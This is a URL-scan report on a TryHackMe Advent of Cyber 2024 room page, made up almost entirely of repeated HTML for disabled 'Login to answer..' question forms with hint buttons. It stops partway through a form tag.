tryhackme.com
2606:4700:10::ac43:1b0a
Public Scan
Submitted URL: https://e.customeriomail.com/e/c/eyJlbWFpbF9pZCI6ImRnVEsxUVVEQU5DZ0M4LWdDd0dUWW95bzN0Q0dMNWZVUm40S0lqZz0iLCJocmVmIjoiaHR0cHM6...
Effective URL: https://tryhackme.com/r/room/adventofcyber2024?reveal=share
Submission: On December 07 via manual from BR — Scanned from CA
Form analysis
53 forms found in the DOM<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="8" name="8" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
